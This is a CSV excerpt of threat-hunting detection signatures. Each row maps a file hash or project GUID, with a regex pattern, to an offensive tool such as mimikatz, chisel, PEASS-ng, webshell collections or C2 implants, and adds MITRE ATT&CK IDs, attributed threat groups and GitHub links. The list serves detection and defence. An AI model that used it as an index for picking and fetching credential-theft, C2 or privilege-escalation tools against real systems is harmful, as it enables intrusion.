"*026a94e75aa94054623b3e2d617c8c59ce6e63edce3e739cbe94283a1eca394a*",".{0,1000}026a94e75aa94054623b3e2d617c8c59ce6e63edce3e739cbe94283a1eca394a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20806"
"*026db4159e7e36e00fdcef1e29f73b40030a3572*",".{0,1000}026db4159e7e36e00fdcef1e29f73b40030a3572.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","20807"
"*026e9623fd5e6f9ea9adb0dc47ec800db36bbcb5080e8e2bb77d47049c638b16*",".{0,1000}026e9623fd5e6f9ea9adb0dc47ec800db36bbcb5080e8e2bb77d47049c638b16.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","20808"
"*02761d4f88230378f0abb1b33c505e497d07c4c160e46a0a7d487870869154f2*",".{0,1000}02761d4f88230378f0abb1b33c505e497d07c4c160e46a0a7d487870869154f2.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","20811"
"*027954d28fd8fa98e06be72439e5a987d2d280a8e3c8d2ab91a4a55d39cbe846*",".{0,1000}027954d28fd8fa98e06be72439e5a987d2d280a8e3c8d2ab91a4a55d39cbe846.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20813"
"*027bf95a524ee9daf472869e548c9221b16d4a5230de187e5ae9ba9a9e98cfba*",".{0,1000}027bf95a524ee9daf472869e548c9221b16d4a5230de187e5ae9ba9a9e98cfba.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","20815"
"*027FAC75-3FDB-4044-8DD0-BC297BD4C461*",".{0,1000}027FAC75\-3FDB\-4044\-8DD0\-BC297BD4C461.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","20817"
"*027FAC75-3FDB-4044-8DD0-BC297BD4C461*",".{0,1000}027FAC75\-3FDB\-4044\-8DD0\-BC297BD4C461.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","20818"
"*027FAC75-3FDB-4044-8DD0-BC297BD4C461*",".{0,1000}027FAC75\-3FDB\-4044\-8DD0\-BC297BD4C461.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","20819"
"*027FAC75-3FDB-4044-8DD0-BC297BD4C461*",".{0,1000}027FAC75\-3FDB\-4044\-8DD0\-BC297BD4C461.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","20820"
"*027FAC75-3FDB-4044-8DD0-BC297BD4C461*",".{0,1000}027FAC75\-3FDB\-4044\-8DD0\-BC297BD4C461.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","20821"
"*028648d9410d8aaf65b7cb4999999947b55f8aa4db3ec24ff82b601b77ecc335*",".{0,1000}028648d9410d8aaf65b7cb4999999947b55f8aa4db3ec24ff82b601b77ecc335.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","20823"
"*0286bd5f-1a56-4251-8758-adb0338d4e98*",".{0,1000}0286bd5f\-1a56\-4251\-8758\-adb0338d4e98.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#GUIDproject","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","20824"
"*02947e9a3759fea352b81bdf4390b6dfb5ea5823ed4836e1e7a46e5d9b65263c*",".{0,1000}02947e9a3759fea352b81bdf4390b6dfb5ea5823ed4836e1e7a46e5d9b65263c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20825"
"*02948DD6-47BD-4C82-9B4B-78931DB23B8A*",".{0,1000}02948DD6\-47BD\-4C82\-9B4B\-78931DB23B8A.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","20826"
"*029558a5c334d67b479885be83f0e0dc856189d1de14ad1d4136b7d451498daa*",".{0,1000}029558a5c334d67b479885be83f0e0dc856189d1de14ad1d4136b7d451498daa.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","20827"
"*0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5*",".{0,1000}0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#filehash","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","20828"
"*029fa62f9ee4ffbf98d5b187c658db8ecff38ccdc4dc5a8c37890446a33d1a23*",".{0,1000}029fa62f9ee4ffbf98d5b187c658db8ecff38ccdc4dc5a8c37890446a33d1a23.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","#filehash","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","20830"
"*02ac483d126c4b08d880cfab52f1904323006b4778f43f536bb83bb38c2a9f2e*",".{0,1000}02ac483d126c4b08d880cfab52f1904323006b4778f43f536bb83bb38c2a9f2e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20832"
"*02b25adcd66eb449917f1d59d0c0f802baec912f2f98293f0612e30b95927591*",".{0,1000}02b25adcd66eb449917f1d59d0c0f802baec912f2f98293f0612e30b95927591.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20833"
"*02bb96ce1e3948500c9bfc51d925ca2f59a32a1ae9e4d871c6913988bdba35f6*",".{0,1000}02bb96ce1e3948500c9bfc51d925ca2f59a32a1ae9e4d871c6913988bdba35f6.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20836"
"*02bb96ce1e3948500c9bfc51d925ca2f59a32a1ae9e4d871c6913988bdba35f6*",".{0,1000}02bb96ce1e3948500c9bfc51d925ca2f59a32a1ae9e4d871c6913988bdba35f6.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20837"
"*02c66658356f846b14ef575627bb2ebbd65b0da6bb092470f95ea59362ee8c14*",".{0,1000}02c66658356f846b14ef575627bb2ebbd65b0da6bb092470f95ea59362ee8c14.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20838"
"*02c6a29b238259a0246547ae5555099e9b64408fe28fec1402e1f31a9ab83e88*",".{0,1000}02c6a29b238259a0246547ae5555099e9b64408fe28fec1402e1f31a9ab83e88.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","20839"
"*02cbcc3c3b79a7f81165838af0605d7238e8c5ad7a6e2d59d7795c1f137fe7a4*",".{0,1000}02cbcc3c3b79a7f81165838af0605d7238e8c5ad7a6e2d59d7795c1f137fe7a4.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","20840"
"*02e559998bedab5437014f159a3c71a86fd94dc5388cfcddf5375ebc75a6f588*",".{0,1000}02e559998bedab5437014f159a3c71a86fd94dc5388cfcddf5375ebc75a6f588.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","20845"
"*02ee841b1c0ff20dd6b50afd104fad2103b1736872173a1b2b036071f8219db1*",".{0,1000}02ee841b1c0ff20dd6b50afd104fad2103b1736872173a1b2b036071f8219db1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20847"
"*02EF15C0-BA19-4115-BB7F-F5B04F7087FE*",".{0,1000}02EF15C0\-BA19\-4115\-BB7F\-F5B04F7087FE.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","20848"
"*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20849"
"*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20850"
"*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20851"
"*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20852"
"*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20853"
"*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20854"
"*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20855"
"*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20856"
"*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20857"
"*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20858"
"*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20859"
"*02f70aded03c76e395624ff19b9f2483b4cc88309d82ca2b5777daa3a5563887*",".{0,1000}02f70aded03c76e395624ff19b9f2483b4cc88309d82ca2b5777daa3a5563887.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","20860"
"*02FAF312-BF2A-466B-8AD2-1339A31C303B*",".{0,1000}02FAF312\-BF2A\-466B\-8AD2\-1339A31C303B.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20861"
"*02fef76d10ce6799f315ed249098a327b978b8967474a2ad03b5c359b5738237*",".{0,1000}02fef76d10ce6799f315ed249098a327b978b8967474a2ad03b5c359b5738237.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","20862"
"*03008e06f61a8a9404a216695d55edf3ee6f021231069968dd08de1a492030ab*",".{0,1000}03008e06f61a8a9404a216695d55edf3ee6f021231069968dd08de1a492030ab.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","20863"
"*030cc05376c7c249583648d5324f8d2bad47ea9af1a4f1a751a09db700eb5817*",".{0,1000}030cc05376c7c249583648d5324f8d2bad47ea9af1a4f1a751a09db700eb5817.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20866"
"*030d5d76052e0da4488b216db816fd13bdaf25e047f0b34820a2b55305f9fd8c*",".{0,1000}030d5d76052e0da4488b216db816fd13bdaf25e047f0b34820a2b55305f9fd8c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20867"
"*030d68dfcc676b9d13c5cc954bf576d0ab617c972c93b21b838637548d697b79*",".{0,1000}030d68dfcc676b9d13c5cc954bf576d0ab617c972c93b21b838637548d697b79.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20868"
"*0313676f45763c5b4e90928b7f9d357253db656f86f8326420f51bbb9fde9238*",".{0,1000}0313676f45763c5b4e90928b7f9d357253db656f86f8326420f51bbb9fde9238.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20870"
"*0316bec32da4114fafd515553b7e928c1a62efebbe5ec57842d17b63beed58df*",".{0,1000}0316bec32da4114fafd515553b7e928c1a62efebbe5ec57842d17b63beed58df.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","20872"
